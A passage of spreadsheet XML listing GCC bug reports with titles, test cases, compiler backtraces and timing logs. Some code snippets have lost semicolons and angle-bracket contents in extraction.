  <si>
    <t>gloog calls rewrite_into_sese_closed_ssa which in turn calls sese_find_uses_to_rename_bb. sese_find_uses_to_rename_bb looks at every phi in every basic block. For each incoming edge into that basic block which is associated with the corresponding use argument of the phi graphite then calls sese_find_uses_to_rename_bb. Now for the use found the def_bb is looked up. If the def_bb exists and def_bb belongs to the scop and use_bb does not belong to scope then a phi is created that can reach the use_bb because def_bb does not reach use_bb.
Right now the check which determines if def_bb belongs to the scop and use_bb does not belong to scop is broken since it looks at dominators and post dominators instead of travesing or looking up the bb's in scop which match with a given bb.</t>
  </si>
  <si>
    <t>hjagasia</t>
  </si>
  <si>
    <t>GCC-62098</t>
  </si>
  <si>
    <t>[4.9/5 regression] incorrect code generated by arm  gcc</t>
  </si>
  <si>
    <t>Compile following source code with options -march=armv7-a  -mfpu=vfpv3 -mfloat-abi=softfp -O2 -std=gnu++11
#include 
#include 
const int kFixedPointDenominator = 64
float ceilToFloat(int m_value)  {
  float floatValue = static_cast(m_value) / kFixedPointDenominator
  if (static_cast(floatValue * kFixedPointDenominator) == m_value)
     return floatValue
  if (floatValue &gt; 0)
     return nextafterf(floatValue std::numeric_limits::max())
  return nextafterf(floatValue std::numeric_limits::min())
}
trunk gcc generates:
	fmsr	s15 r0	@ int
	vcvt.f32.s32	s15 s15 #6          // A
	vcvt.s32.f32	s15 s15 #6          // B
	vmov	r3 s15
	cmp	r3 r0
	beq	.L2
	fcmpezs	s15
	fmstat
	ble	.L6
	movw	r1 #65535
	fmrs	r0 s15
	movt	r1 32639
	b	nextafterf
.L6:
	mov	r1 #8388608
	fmrs	r0 s15
	b	nextafterf
.L2:
	fmrs	r0 s15                       // C
	bx	lr
Instruction C returns the result of instruction B but the expected return value is the result of instruction A.
4.9 branch generates the same wrong codes but 4.8 is correct.</t>
  </si>
  <si>
    <t>GCC-19313</t>
  </si>
  <si>
    <t>inquire(pad=) not implemented</t>
  </si>
  <si>
    <t>$ cat pad.f
      character*20 chr
      open(7)
      inquire(7pad=chr)
      print *chr
      end
$ gfortran pad.f &amp;&amp; ./a.out
$ gfortran -v  gfortran -dumpmachine
Using built-in specs.
Configured with: ../gcc-4.0-20050102/configure --prefix=/home/zfkts
--enable-languages=cc++f95
Thread model: posix
gcc version 4.0.0 20050102 (experimental)
ia64-unknown-linux-gnu
This is not a g77 regression. g77 does not support pad= in inquire.</t>
  </si>
  <si>
    <t>GCC-33436</t>
  </si>
  <si>
    <t>Bad constant output with TARGET_ASM_ALIGNED_DI_OP</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc/objdir/gcc/xgcc -B/mnt/gnu/gcc/objdir/gcc/ /mnt/
gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr32912-2.c   -O2 -w -fno-show-column  -lm   -o
 ./pr32912-2.exe    (timeout = 300)
/var/tmp//cclFD5RH.s: Assembler messages:
/var/tmp//cclFD5RH.s:5: Warning: bignum truncated to 8 bytes
output is:
/var/tmp//cclFD5RH.s: Assembler messages:
/var/tmp//cclFD5RH.s:5: Warning: bignum truncated to 8 bytes
FAIL: gcc.dg/pr32912-2.c (test for excess errors)
Excess errors:
/var/tmp//cclFD5RH.s:5: Warning: bignum truncated to 8 bytes
Setting LD_LIBRARY_PATH to :/mnt/gnu/gcc/objdir/gcc::/mnt/gnu/gcc/objdir/gcc
FAIL: gcc.dg/pr32912-2.c execution test
        .LEVEL 2.0w
        .section        .rodata
        .align 8
L$C0000:
        .dword  0x11111111222222224444444400000000
...
Mainline is ok.</t>
  </si>
  <si>
    <t>GCC-19876</t>
  </si>
  <si>
    <t>[4.0 Regression] g++ starts eating all the memory and the CPU</t>
  </si>
  <si>
    <t>Hi    
I'm developing a linux distribution with friends and we decided to use gcc 4.    
A few days ago KDE 3.3.92 was released.     
But it doesn't compile :( Especially with the kdepim package g++ starts    
eating all the memory and all the CPU on a file.     
I can't submit this file because it relies on a lot of headers and libs from    
KDE and Qt so it would be to heavy.    
Here is the command line :   
if /bin/sh ../libtool --silent --mode=compile --tag=CXX g++ -DHAVE_CONFIG_H   
-I. -I. -I.. -I../libkmime -I../libkpgp -I../libkdenetwork -I../libkdepim   
-I../libkpimidentities -I../libemailfunctions -I../libksieve -I../mimelib   
-I../certmanager/lib -I..  -I../libkdepim -I/usr/lib/qt3/include   
-I/usr/X11R6/include   -DQT_THREAD_SUPPORT  -D_REENTRANT   
-D_FILE_OFFSET_BITS=64  -Wnon-virtual-dtor -Wno-long-long -Wundef -ansi   
-D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -Wchar-subscripts   
-Wall -W -Wpointer-arith -Wwrite-strings -O2 -Wformat-security   
-Wmissing-format-attribute -fno-exceptions -fno-check-new -fno-common   
-DQT_CLEAN_NAMESPACE -DQT_NO_ASCII_CAST -DQT_NO_STL -DQT_NO_COMPAT   
-DQT_NO_TRANSLATION  -MT globalsettings.lo -MD -MP -MF   
.deps/globalsettings.Tpo -c -o globalsettings.lo globalsettings.cpp \   
then mv -f .deps/globalsettings.Tpo .deps/globalsettings.Plo else rm -f   
.deps/globalsettings.Tpo exit 1 fi   
Configure of gcc :   
../gcc-4.0-20050130/configure --prefix=/usr --libexecdir=/usr/lib  
--enable-shared --enable-threads=posix --enable-__cxa_atexit  
--enable-clocale=gnu --enable-languages=cc++javaobjc --with-libffi  
--enable-libffi  
I reported the bug on bugs.kde.org too : 
http://bugs.kde.org/show_bug.cgi?id=99045 
Thanks</t>
  </si>
  <si>
    <t>pied</t>
  </si>
  <si>
    <t>GCC-62061</t>
  </si>
  <si>
    <t>[5 Regression] FAIL: g++.dg/lto/20100302 cp_lto_20100302_0.o-cp_lto_20100302_1.o link -flto -fabi-version=2</t>
  </si>
  <si>
    <t>Currently g++.dg/lto/20100302 ICEs in:
Executing on host: /home/uros/gcc-build/gcc/testsuite/g++/../../xg++ -B/home/uros/gcc-build/gcc/testsuite/g++/../../ cp_lto_20100302_0.o cp_lto_20100302_1.o  -fno-diagnostics-show-caret -fdiagnostics-color=never  -nostdinc++ -I/home/uros/gcc-build/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/home/uros/gcc-build/x86_64-unknown-linux-gnu/32/libstdc++-v3/include -I/home/uros/gcc-svn/trunk/libstdc++-v3/libsupc++ -I/home/uros/gcc-svn/trunk/libstdc++-v3/include/backward -I/home/uros/gcc-svn/trunk/libstdc++-v3/testsuite/util -fmessage-length=0 -flto -fabi-version=2     -L/home/uros/gcc-build/x86_64-unknown-linux-gnu/32/libstdc++-v3/src/.libs  -B/home/uros/gcc-build/x86_64-unknown-linux-gnu/32/libstdc++-v3/src/.libs  -L/home/uros/gcc-build/x86_64-unknown-linux-gnu/32/libstdc++-v3/src/.libs      -m32  -o g++-dg-lto-20100302-01.exe
lto1: internal compiler error: in add_symbol_to_partition at lto/lto-partition.c:232
0x50a74f add_symbol_to_partition
	../../gcc-svn/trunk/gcc/lto/lto-partition.c:232
0x50a34b add_references_to_partition
	../../gcc-svn/trunk/gcc/lto/lto-partition.c:94
0x50a4a3 add_symbol_to_partition_1
	../../gcc-svn/trunk/gcc/lto/lto-partition.c:168
0x50ab0e lto_balanced_map(int)
	../../gcc-svn/trunk/gcc/lto/lto-partition.c:494
0x504b24 do_whole_program_analysis
	../../gcc-svn/trunk/gcc/lto/lto.c:3271
0x504b24 lto_main()
	../../gcc-svn/trunk/gcc/lto/lto.c:3425
Please submit a full bug report
with preprocessed source if appropriate.
target is i686-linux-gnu GNU ld version 2.17.50.0.6-26.el5 20061020 (CENTOS 5).</t>
  </si>
  <si>
    <t>GCC-9280</t>
  </si>
  <si>
    <t>Internal compiler error in convert_from_eh_region_ranges_1</t>
  </si>
  <si>
    <t>void* operator new(unsigned void* __p) throw()
void  operator delete  (void* void*) throw()
struct S
	{
	S()
	}
int f()
	{
	new(new S)S
	}
Release:
Configured with: /mnt/data/gcc-3.1/gcc-3.2-3.2.1ds2/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-sh
Environment:
Linux enterprise 2.4.19 #1 Sat Aug 17 14:31:15 CEST 2002 i686 AMD Athlon(tm) XP 2000+ AuthenticAMD GNU/Linux
How-To-Repeat:
gcc-3.2 -c Bug.ii
Unformatted:
 ared --with-system-zlib --enable-nls --without-included-gettext --enable-java-gc=boehm --enable-objc-gc i386-linux
 Thread model: posix
 gcc version 3.2.1 20020924 (Debian prerelease)</t>
  </si>
  <si>
    <t>GCC-70332</t>
  </si>
  <si>
    <t>[5 Regression] ICE on x86_64-linux-gnu in tsubst_copy at cp/pt.c:13887</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current GCC trunk (and 5.x) on x86_64-linux-gnu in both 32-bit and 64-bit modes. 
It is a regression from 4.9.x. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20160320 (experimental) [trunk revision 234355] (GCC) 
$ 
$ g++-trunk -c -std=c++14 small.cpp
small.cpp:4:9: internal compiler error: in tsubst_copy at cp/pt.c:13887
   T m = m
         ^
0x686f54 tsubst_copy
	../../gcc-source-trunk/gcc/cp/pt.c:13887
0x6885eb tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc-source-trunk/gcc/cp/pt.c:16987
0x689a7d tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc-source-trunk/gcc/cp/pt.c:16030
0x68998e tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc-source-trunk/gcc/cp/pt.c:16007
0x68a178 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc-source-trunk/gcc/cp/pt.c:16768
0x790ed4 get_nsdmi(tree_node* bool)
	../../gcc-source-trunk/gcc/cp/init.c:568
0x6cc7f0 process_init_constructor_record
	../../gcc-source-trunk/gcc/cp/typeck2.c:1415
0x6cc7f0 process_init_constructor
	../../gcc-source-trunk/gcc/cp/typeck2.c:1594
0x6cc7f0 digest_init_r
	../../gcc-source-trunk/gcc/cp/typeck2.c:1123
0x6ced8a digest_init_flags
	../../gcc-source-trunk/gcc/cp/typeck2.c:1168
0x6ced8a store_init_value(tree_node* tree_node* vec** int)
	../../gcc-source-trunk/gcc/cp/typeck2.c:802
0x62fa04 check_initializer
	../../gcc-source-trunk/gcc/cp/decl.c:6155
0x6595fc cp_finish_decl(tree_node* tree_node* bool tree_node* int)
	../../gcc-source-trunk/gcc/cp/decl.c:6783
0x75279f cp_parser_init_declarator
	../../gcc-source-trunk/gcc/cp/parser.c:18658
0x752f50 cp_parser_simple_declaration
	../../gcc-source-trunk/gcc/cp/parser.c:12379
0x753261 cp_parser_block_declaration
	../../gcc-source-trunk/gcc/cp/parser.c:12248
0x75bdd0 cp_parser_declaration
	../../gcc-source-trunk/gcc/cp/parser.c:12145
0x75a894 cp_parser_declaration_seq_opt
	../../gcc-source-trunk/gcc/cp/parser.c:12024
0x75abc8 cp_parser_translation_unit
	../../gcc-source-trunk/gcc/cp/parser.c:4323
0x75abc8 c_parse_file()
	../../gcc-source-trunk/gcc/cp/parser.c:37408
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
$ g++-4.9 -c -std=c++14 small.cpp
$  
$ clang++-trunk -c -std=c++14 small.cpp
$ 
-------------------------
template   
struct C
{
  T m = m
}
C  c {}</t>
  </si>
  <si>
    <t>GCC-56570</t>
  </si>
  <si>
    <t>ICE when streaming a TREE_BLOCK</t>
  </si>
  <si>
    <t>Created attachment 29617
Pre-processed failing source
When building Mozilla Firefox with LTO (gcc revision 196427 FF
changeset 123831:c95439870e05) I'm encountering an ICE when compiling
js/src/ion/shared/CodeGenerator-shared.cpp (and I suppose the same one
in a number of other files).  The problem occurs in the compilation
phase.
The ICE simply disappears when I add -save-temps to the command line
but reappeared when I also added --param ggc-min-expand=10 --param
ggc-min-heapsize=1024.  The attached resultant .ii file also ICEs but
--param ggc-min-expand=5 --param ggc-min-heapsize=512 is necessary to
trigger it.</t>
  </si>
  <si>
    <t>GCC-52382</t>
  </si>
  <si>
    <t>Atomic builtins documentation page not found</t>
  </si>
  <si>
    <t>The link below is referred to from a couple of pages (e.g. http://gcc.gnu.org/wiki/Atomic#Status) but it's not found
http://gcc.gnu.org/onlinedocs/gcc/Atomic-Builtins.html#Atomic-Builtins</t>
  </si>
  <si>
    <t>GCC-16266</t>
  </si>
  <si>
    <t>[4.0 regression] gcc.dg/c99-intconst-1.c compilation is very slow</t>
  </si>
  <si>
    <t>gcc 3.5 takes some 33 times as long to compile gcc.dg/c99-intconst-1.c as gcc
3.4 does.  Although we have checking enabled I think a factor of 33 is
excessive.  The test sometimes times out depending on the load of the machine.
bash-2.05$ time /swbuild/nightly/3.4-2004-06-28/sh-elf/gcc/cc1 -v -iprefix
/swbuild/nightly/3.4-2004-06-28/sh-elf/gcc/../lib/gcc/sh-elf/3.4.1/ -isystem
/swbuild/nightly/3.4-2004-06-28/sh-elf/gcc/include -DSTACK_SIZE=16384 -isystem
/swbuild/nightly/3.4-2004-06-28/sh-elf/sh-elf/./newlib/targ-include -isystem
/swbuild/nightly/3.4-2004-06-28/srcw/newlib/libc/include
/swbuild/nightly/3.4-2004-06-28/srcw/gcc/testsuite/gcc.dg/c99-intconst-1.c 
-dumpbase c99-intconst-1.c -auxbase-strip c99-intconst-1.s -pedantic-errors
-std=iso9899:1999 -version -o c99-intconst-1.s
ignoring nonexistent directory
/swbuild/nightly/3.4-2004-06-28/sh-elf/gcc/../lib/gcc/sh-elf/3.4.1/include
ignoring nonexistent directory
/swbuild/nightly/3.4-2004-06-28/sh-elf/gcc/../lib/gcc/sh-elf/3.4.1/../../../../sh-elf/sys-include
ignoring nonexistent directory
/swbuild/nightly/3.4-2004-06-28/sh-elf/gcc/../lib/gcc/sh-elf/3.4.1/../../../../sh-elf/include
ignoring nonexistent directory /usr/local/lib/gcc/sh-elf/3.4.1/include
ignoring nonexistent directory /usr/local/lib/../sh-elf/sys-include
ignoring nonexistent directory /usr/local/lib/../sh-elf/include
#include ... search starts here:
#include  search starts here:
 /swbuild/nightly/3.4-2004-06-28/sh-elf/gcc/include
 /swbuild/nightly/3.4-2004-06-28/sh-elf/sh-elf/./newlib/targ-include
 /swbuild/nightly/3.4-2004-06-28/srcw/newlib/libc/include
End of search list.
GNU C version 3.4.1 20040628 (prerelease) (sh-elf)
        compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.1 2.96-98).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
options passed:  -v -iprefix -isystem -DSTACK_SIZE=16384 -isystem -isystem
 -auxbase-strip -pedantic-errors -std=iso9899:1999
options enabled:  -feliminate-unused-debug-types -fpeephole -ffunction-cse
 -fkeep-static-consts -freg-struct-return -fgcse-lm -fgcse-sm -fgcse-las
 -fsched-interblock -fsched-spec -fsched-stalled-insns
 -fsched-stalled-insns-dep -fbranch-count-reg -fcommon -fargument-alias
 -fzero-initialized-in-bss -fident -fmath-errno -ftrapping-math -m1
 foo
Execution times (seconds)
 cfg construction      :   0.06 ( 1%) usr   0.01 ( 1%) sys   0.07 ( 1%) wall
 cfg cleanup           :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.03 ( 0%) wall
 trivially dead code   :   0.04 ( 1%) usr   0.00 ( 0%) sys   0.03 ( 0%) wall
 life analysis         :   0.13 ( 2%) usr   0.00 ( 0%) sys   0.14 ( 2%) wall
 life info update      :   0.07 ( 1%) usr   0.00 ( 0%) sys   0.07 ( 1%) wall
 register scan         :   0.05 ( 1%) usr   0.00 ( 0%) sys   0.06 ( 1%) wall
 rebuild jump labels   :   0.05 ( 1%) usr   0.00 ( 0%) sys   0.04 ( 1%) wall
 preprocessing         :   0.92 (13%) usr   0.21 (24%) sys   1.07 (14%) wall
 lexical analysis      :   0.86 (12%) usr   0.33 (37%) sys   1.15 (15%) wall
 parser                :   1.83 (27%) usr   0.26 (30%) sys   2.17 (28%) wall
 expand                :   0.41 ( 6%) usr   0.01 ( 1%) sys   0.43 ( 6%) wall
 jump                  :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall
 flow analysis         :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall
 local alloc           :   0.82 (12%) usr   0.01 ( 1%) sys   0.83 (11%) wall
 global alloc          :   0.56 ( 8%) usr   0.02 ( 2%) sys   0.58 ( 7%) wall
 flow 2                :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall
 machine dep reorg     :   0.16 ( 2%) usr   0.01 ( 1%) sys   0.18 ( 2%) wall
 shorten branches      :   0.16 ( 2%) usr   0.00 ( 0%) sys   0.16 ( 2%) wall
 final                 :   0.23 ( 3%) usr   0.01 ( 1%) sys   0.24 ( 3%) wall
 rest of compilation   :   0.44 ( 6%) usr   0.00 ( 0%) sys   0.43 ( 6%) wall
 TOTAL                 :   6.88             0.88             7.75
real    0m7.775s
user    0m6.880s
sys     0m0.900s
bash-2.05$ time /swbuild/nightly/2004-06-28/sh-elf/gcc/cc1  -v -iprefix /swbuild
/nightly/2004-06-28/sh-elf/gcc/../lib/gcc/sh-elf/3.5.0/ -isystem /swbuild/nightl
y/2004-06-28/sh-elf/gcc/include -DSTACK_SIZE=16384 -isystem /swbuild/nightly/200
4-06-28/sh-elf/sh-elf/./newlib/targ-include -isystem /swbuild/nightly/2004-06-28
/srcw/newlib/libc/include /swbuild/nightly/2004-06-28/srcw/gcc/testsuite/gcc.dg/
c99-intconst-1.c  -dumpbase c99-intconst-1.c -auxbase-strip c99-intconst-1.s -pe
dantic-errors -std=iso9899:1999 -version -o c99-intconst-1.s
ignoring nonexistent directory /swbuild/nightly/2004-06-28/sh-elf/gcc/../lib/gc
c/sh-elf/3.5.0/include
ignoring nonexistent directory /swbuild/nightly/2004-06-28/sh-elf/gcc/../lib/gc
c/sh-elf/3.5.0/../../../../sh-elf/sys-include
ignoring nonexistent directory /swbuild/nightly/2004-06-28/sh-elf/gcc/../lib/gc
c/sh-elf/3.5.0/../../../../sh-elf/include
ignoring nonexistent directory /usr/local/lib/gcc/sh-elf/3.5.0/include
ignoring nonexistent directory /usr/local/lib/../sh-elf/sys-include
ignoring nonexistent directory /usr/local/lib/../sh-elf/include
#include ... search starts here:
#include  search starts here:
 /swbuild/nightly/2004-06-28/sh-elf/gcc/include
 /swbuild/nightly/2004-06-28/sh-elf/sh-elf/./newlib/targ-include
 /swbuild/nightly/2004-06-28/srcw/newlib/libc/include
End of search list.
GNU C version 3.5.0 20040628 (experimental) (sh-elf)
        compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.1 2.96-98).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
options passed:  -v -iprefix -isystem -DSTACK_SIZE=16384 -isystem -isystem
 -auxbase-strip -pedantic-errors -std=iso9899:1999
options enabled:  -falign-loops -fargument-alias -fbranch-count-reg
 -fcommon -feliminate-unused-debug-types -ffunction-cse -fgcse-las
 -fgcse-lm -fgcse-sm -fident -fkeep-static-consts -fleading-underscore
 -floop-optimize2 -fmath-errno -fpeephole -freg-struct-return
 -fsched-interblock -fsched-spec -fsched-stalled-insns-dep -fvar-tracking
 -fweb -fzero-initialized-in-bss -m1
 foo
 {GC 75894k -&gt; 35085k} {GC 56742k -&gt; 45092k}
Execution times (seconds)
 garbage collection    :   0.91 ( 0%) usr   0.02 ( 1%) sys   0.94 ( 0%) wall
 CFG verifier          :   0.61 ( 0%) usr   0.01 ( 1%) sys   0.59 ( 0%) wall
 trivially dead code   :   0.09 ( 0%) usr   0.00 ( 0%) sys   0.09 ( 0%) wall
 life analysis         :   0.34 ( 0%) usr   0.00 ( 0%) sys   0.34 ( 0%) wall
 life info update      :   0.16 ( 0%) usr   0.00 ( 0%) sys   0.16 ( 0%) wall
 register scan         :   0.15 ( 0%) usr   0.01 ( 1%) sys   0.16 ( 0%) wall
 rebuild jump labels   :   0.05 ( 0%) usr   0.00 ( 0%) sys   0.05 ( 0%) wall
 preprocessing         :   1.07 ( 0%) usr   0.16 ( 9%) sys   1.27 ( 0%) wall
 lexical analysis      :   0.86 ( 0%) usr   0.30 (16%) sys   1.30 ( 1%) wall
 parser                :   2.55 ( 1%) usr   0.23 (13%) sys   2.59 ( 1%) wall
 tree gimplify         :   0.37 ( 0%) usr   0.01 ( 1%) sys   0.37 ( 0%) wall
 tree eh               :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 tree CFG construction :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.03 ( 0%) wall
 tree STMT verifier    :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.04 ( 0%) wall
 expand                : 111.13 (44%) usr   0.04 ( 2%) sys 111.31 (44%) wall
 jump                  :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall
 flow analysis         :   0.07 ( 0%) usr   0.00 ( 0%) sys   0.07 ( 0%) wall
 local alloc           :   2.60 ( 1%) usr   0.06 ( 3%) sys   2.65 ( 1%) wall
 global alloc          : 128.69 (51%) usr   0.74 (40%) sys 129.52 (51%) wall
 flow 2                :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall
 machine dep reorg     :   1.02 ( 0%) usr   0.00 ( 0%) sys   1.02 ( 0%) wall
 shorten branches      :   0.50 ( 0%) usr   0.01 ( 1%) sys   0.51 ( 0%) wall
 final                 :   0.69 ( 0%) usr   0.22 (12%) sys   0.94 ( 0%) wall
 symout                :   0.00 ( 0%) usr   0.01 ( 1%) sys   0.00 ( 0%) wall
 rest of compilation   :   0.85 ( 0%) usr   0.01 ( 1%) sys   0.85 ( 0%) wall
 TOTAL                 : 252.87             1.83           254.94
Extra diagnostic checks enabled compiler may run slowly.
Configure with --disable-checking to disable checks.
real    4m15.094s
user    4m12.870s
sys     0m1.860s
bash-2.05$ cat /proc/cpuinfo
processor       : 0
vendor_id       : AuthenticAMD
cpu family      : 6
model           : 6
model name      : AMD Athlon(tm) MP Processor 1600+
stepping        : 2
cpu MHz         : 1400.044
cache size      : 256 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 1
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov
pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow
bogomips        : 2791.83
processor       : 1
vendor_id       : AuthenticAMD
cpu family      : 6
model           : 6
model name      : AMD Athlon(tm) Processor
stepping        : 2
cpu MHz         : 1400.044
cache size      : 256 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 1
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov
pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow
bogomips        : 2798.38</t>
  </si>
  <si>
    <t>GCC-80866</t>
  </si>
  <si>
    <t>[8 Regression] segfault in is_overloaded_fn()</t>
  </si>
  <si>
    <t>% cat pow_test.ii
void pow()
namespace math {
template  void pow(T)
}
using namespace math
decltype(pow(0)) z()
 % g++ -c pow_test.ii
pow_test.ii:6:10: internal compiler error: Segmentation fault
 decltype(pow(0)) z()
          ^~~~~
0xd537bf crash_signal
        ../../gcc/gcc/toplev.c:337
0x7acc14 is_overloaded_fn(tree_node*)
        ../../gcc/gcc/cp/tree.c:2297
0x792535 finish_id_expression(tree_node* tree_node* tree_node* cp_id_kind* bool bool bool* bool bool bool bool char const** unsigned int)
        ../../gcc/gcc/cp/semantics.c:3742
0x6f25c2 cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:5325
0x70576f cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:6781
0x70652d cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:8117
0x707543 cp_parser_cast_expression
        ../../gcc/gcc/cp/parser.c:8796
0x707c67 cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:8897
0x708544 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:9184
0x70c388 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:9353
0x70c87c cp_parser_decltype_expr
        ../../gcc/gcc/cp/parser.c:13756
0x70c87c cp_parser_decltype
        ../../gcc/gcc/cp/parser.c:13836
0x71294f cp_parser_simple_type_specifier
        ../../gcc/gcc/cp/parser.c:16735
0x7001bd cp_parser_type_specifier
        ../../gcc/gcc/cp/parser.c:16520
0x70140a cp_parser_decl_specifier_seq
        ../../gcc/gcc/cp/parser.c:13353
0x720551 cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:12678
0x721455 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:12625
0x726924 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:12523
0x72855b cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:12399
0x72883a cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:4364</t>
  </si>
  <si>
    <t>GCC-17473</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] typedef redefinition in struct is accepted</t>
  </si>
  <si>
    <t>(accepts-illegal)
the following code
struct S {
  typedef int Int
  typedef int Int
}
is accepted by g++.  This is illegal according to 9.2/1
A member shall not be be declared twice in the /member-
specification/ except that a nested class or member class
template can be declared and then later defined.
Note that this conflicts with 7.1.3/2 but 9.2/1 is more specific (class-only
specification scopes).</t>
  </si>
  <si>
    <t>GCC-58923</t>
  </si>
  <si>
    <t>g++ does not use provided conversion function for implicit conversion to another type</t>
  </si>
  <si>
    <t>Created attachment 31112
Source file with complete test case
g++ is not able to compile the following test case which you also can find in the attachment (file: 'cast.cc').
struct A
{
	virtual void do_it() const = 0
}
struct B :  A
{
	virtual void do_it() const {}
}
struct C
{
	operator B() const { return B() }
}
void do_it(const A }
int main()
{
	C c
	do_it(c)
	return 0
}
When compiling this test case with clang++ (version 3.3) or the intel c++ compiler (versions 12.1 and 13.1) compilation succeeds without errors. When compiling the same test case with g++ (version 4.8.1 from MacPorts running OSX Mavericks) the following errors are shown:
cast.cc: In function 'int main()':
cast.cc:21:9: error: cannot allocate an object of abstract type 'A'
 do_it(c)
        ^
cast.cc:1:8: note:   because the following virtual functions are pure within 'A':
struct A
       ^
cast.cc:3:15: note: 	virtual void A::do_it() const
 virtual void do_it() const = 0
              ^
I get the same errors when i try to compile the test case with g++ (versions 4.8.1 4.7.0 4.6.1 4.3.4 3.3.6) running on SUSE Linux.
Basically I have an abstract base class A and some implementation B. Another class C provides a conversion operator to B. When passing instances of C to functions that take const references of A clang++ and icpc is able to find the conversion to B and is then able to convert the temporary instance of B to a const reference of A. I think in the same case g++ tries to make a temporary instance of A initialized with the instance of C which is not possible. 
A workaround for this problem is to explicitly convert the instance of C to B like this:
do_it((B)c)
But then it would be nice if this is not necessary.
Here is the output of gcc-mp-4.8 -v
Using built-in specs.
COLLECT_GCC=gcc-mp-4.8
COLLECT_LTO_WRAPPER=/opt/local/libexec/gcc/x86_64-apple-darwin13/4.8.1/lto-wrapper
Target: x86_64-apple-darwin13
Configured with: /opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_lang_gcc48/gcc48/work/gcc-4.8.1/configure --prefix=/opt/local --build=x86_64-apple-darwin13 --enable-languages=cc++objcobj-c++ltofortranjava --libdir=/opt/local/lib/gcc48 --includedir=/opt/local/include/gcc48 --infodir=/opt/local/share/info --mandir=/opt/local/share/man --datarootdir=/opt/local/share/gcc-4.8 --with-local-prefix=/opt/local --with-system-zlib --disable-nls --program-suffix=-mp-4.8 --with-gxx-include-dir=/opt/local/include/gcc48/c++/ --with-gmp=/opt/local --with-mpfr=/opt/local --with-mpc=/opt/local --with-cloog=/opt/local --enable-cloog-backend=isl --disable-cloog-version-check --enable-stage1-checking --disable-multilib --enable-lto --enable-libstdcxx-time --with-as=/opt/local/bin/as --with-ld=/opt/local/bin/ld --with-ar=/opt/local/bin/ar --with-bugurl=https://trac.macports.org/newticket --with-pkgversion='MacPorts gcc48 4.8.1_3'
Thread model: posix
gcc version 4.8.1 (MacPorts gcc48 4.8.1_3)</t>
  </si>
  <si>
    <t>andre.ritter</t>
  </si>
  <si>
    <t>GCC-25676</t>
  </si>
  <si>
    <t>Use of MIN_EXPR/MAX_EXPR is wrong for java</t>
  </si>
  <si>
    <t>Testcase:
class f
{
  public static double g(double a double b)
  {
    return Math.min(a b)
  }
  public static void main(String a[])
  {
    System.out.println (g(0.0 -0.0))
    System.out.println (g(-0.0 0.0))
  }
}
----
This should print -0.0 and -0.0.  Currently it prints 0.0 -0.0 for x86-linux-gnu.
Note it is okay to use MIN_EXPR/MAX_EXPR for integers though.</t>
  </si>
  <si>
    <t>GCC-6401</t>
  </si>
  <si>
    <t>-o does not work when -E and -MD are used</t>
  </si>
  <si>
    <t>When using the -E and -MD options the -o option has no effect. The output of the preprocessor is always sent to the standard output. (If -MD is not used the output is sent to the specified file as expected.)
Release:
gcc-3.0.4
Environment:
Red Hat Linux 7.2 on i386
How-To-Repeat:
gcc -E test.c -o test.i -MD</t>
  </si>
  <si>
    <t>anders</t>
  </si>
  <si>
    <t>GCC-26213</t>
  </si>
  <si>
